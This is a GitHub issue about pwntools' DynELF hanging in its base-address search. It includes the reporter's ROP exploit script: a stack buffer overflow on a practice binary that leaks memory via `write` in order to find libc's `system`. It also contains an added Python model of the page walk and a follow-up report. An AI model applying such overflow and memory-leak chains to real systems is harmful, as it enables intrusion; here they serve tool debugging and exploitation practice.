
DynELF cannot break the endless loop in dynelf.py

Open. Kiprey opened this issue 4 years ago • 1 comment

This is my code:

from pwn import *

# Exploit script as posted, with bytes literals so the payload concatenation
# works under Python 3 (str + bytes raises TypeError there).
p = process("./pwn1_64")
e = ELF("./pwn1_64")

plt_write_addr = e.plt["write"]
start_addr = e.symbols["vulnerable_function"]
pop_rsi_rdx_rdi_addr = 0x40053b  # gadget: pop rsi; pop rdx; pop rdi; ret

def leak(address):
    # Overflow the 136-byte buffer, then call write(1, address, 4) and
    # return to vulnerable_function so the next leak can be issued.
    payload1 = b"a" * 136
    payload1 += p64(pop_rsi_rdx_rdi_addr) + p64(address) + p64(4) + p64(1)
    payload1 += p64(plt_write_addr)
    payload1 += p64(start_addr)
    p.sendline(payload1)
    data = p.recv()  # whatever the process printed; expected to be the 4 leaked bytes
    return data

dyn_elf = DynELF(leak, elf=e)
system_addr = dyn_elf.lookup("system", "libc")

When I execute this line,

dyn_elf = DynELF(leak, elf=e)

the program gets stuck. So I tried to debug it and stepped into "dynelf.py", discovering that
in class DynELF, method _find_base,

    def _find_base(self, ptr):
        page_size = 0x1000
        page_mask = ~(page_size - 1)

        ptr &= page_mask
        w = None

        while True:
            if self.leak.compare(ptr, '\x7fELF'):
                break

            # See if we can short circuit the search
            fast = self._find_base_optimized(ptr)
            if fast:
                ptr = fast
                continue

            ptr -= page_size

            if ptr < 0:
                raise ValueError("Address is negative, something is wrong!")

            # Defer creating the spinner in the event that 'ptr'
            # is already the base address
            w = w or self.waitfor("Finding base address")
            self.status('%#x' % ptr)

        # If we created a spinner, print the success message
        if w:
            self.success('%#x' % ptr)

        return ptr

the condition for breaking the loop is never met.

I don't know why. But I found something interesting. While debugging, I once tried to run my Python script in the console line by line. I mean, after one line of code had been executed in the Python interpreter, I typed the next line into the console and waited for it to be executed, too.

When I entered dyn_elf = DynELF(leak, elf=e), unsurprisingly the program got stuck. So I pressed Ctrl+C to stop it.

But when I entered the same code to try again, the program didn't get stuck at all! It seems to work very badly, though.

Here is the screenshot. [image] [image]

I don't know why either. But I hope this situation can help you. This is my pwn file: pwn1_64.zip. I hope it can help you, too!

My English is a little poor; I hope it doesn't bother you.

Kiprey, Jan 29 '20 12:01
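The page walk quoted from _find_base, modelled in plain Python as an added example (this is not pwntools code and does not import it). The target memory is a constructed image: a fake 64-bit ELF header mapped at 0x400000 with a few pages above it. `find_base` follows the same idea as the quoted loop (mask to a page boundary, look for b"\x7fELF", step down one page) but, unlike dynelf.py, bounds the search with a `max_pages` cap and checks that the leak callback returned bytes; both of those are my additions. The two leak callbacks show the contract a DynELF leak has to honour: the returned buffer must be the bytes of target memory starting exactly at the requested address. `chatty_leak` models what happens when a bare `recv()` also picks up the program's prompt, so the magic is never at offset 0 and the search can never terminate on its own.

```python
# Added example (not pwntools code): a minimal model of how DynELF's
# _find_base walks backwards page by page until it reads b"\x7fELF",
# and what a leak callback must return for that check to succeed.
PAGE_SIZE = 0x1000
PAGE_MASK = ~(PAGE_SIZE - 1)
ELF_MAGIC = b"\x7fELF"

# Constructed "target memory": a fake ELF image mapped at 0x400000 with a
# 64-bit ELF header at its base and some code two pages above it.
FAKE_BASE = 0x400000
FAKE_IMAGE = bytearray(PAGE_SIZE * 3)
FAKE_IMAGE[0:4] = ELF_MAGIC
FAKE_IMAGE[4:8] = bytes([2, 1, 1, 0])        # ELFCLASS64, little-endian, EV_CURRENT
FAKE_IMAGE[0x2500:0x2600] = b"\x90" * 0x100  # pretend .plt lives on the third page


def read_memory(address, n):
    """Simulate the primitive a write()-based ROP chain gives you:
    return n bytes of target memory at address, or None if unmapped."""
    off = address - FAKE_BASE
    if 0 <= off and off + n <= len(FAKE_IMAGE):
        return bytes(FAKE_IMAGE[off:off + n])
    return None


def good_leak(address):
    """A well-behaved DynELF-style leak callback: bytes at address (or None)."""
    return read_memory(address, 4)


def chatty_leak(address):
    """A broken leak: recv() also picked up the program's prompt, so the
    returned buffer does not start with the bytes at `address`."""
    data = read_memory(address, 4)
    return None if data is None else b"Input:\n" + data


def find_base(leak, ptr, max_pages=0x1000):
    """Page-walk from ptr towards lower addresses until the leak shows the
    ELF magic at a page boundary. Unlike the loop quoted from dynelf.py,
    this version is bounded (max_pages, an assumption of this example) and
    validates what the callback returns, so a broken leak fails loudly
    instead of spinning forever."""
    start = ptr & PAGE_MASK
    ptr = start
    for _ in range(max_pages):
        data = leak(ptr)
        if data is not None and not isinstance(data, (bytes, bytearray)):
            raise TypeError("leak callback must return bytes, got %s"
                            % type(data).__name__)
        if data is not None and data[:4] == ELF_MAGIC:
            return ptr
        ptr -= PAGE_SIZE
        if ptr < 0:
            raise ValueError("Address is negative, something is wrong!")
    raise RuntimeError("no ELF header found within %d pages below %#x"
                       % (max_pages, start))


if __name__ == "__main__":
    # Starting from a pointer into the fake .plt, the walk takes two steps down.
    print("%#x" % find_base(good_leak, FAKE_BASE + 0x2540))
    try:
        find_base(chatty_leak, FAKE_BASE + 0x2540, max_pages=8)
    except RuntimeError as exc:
        print("chatty leak:", exc)
```

A real leak callback for DynELF should therefore return only the bytes written by the `write(1, address, 4)` call, not the whole buffer a bare `recv()` happens to return, and it must return bytes rather than a str under Python 3.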

Similar to the above, I encountered a problem in which the DynELF function could not jump out of the loop and caused a memory leak, resulting in the PoC process being killed by the system. My pwntools version is 4.5.0.

ioxera, May 27 '21 02:05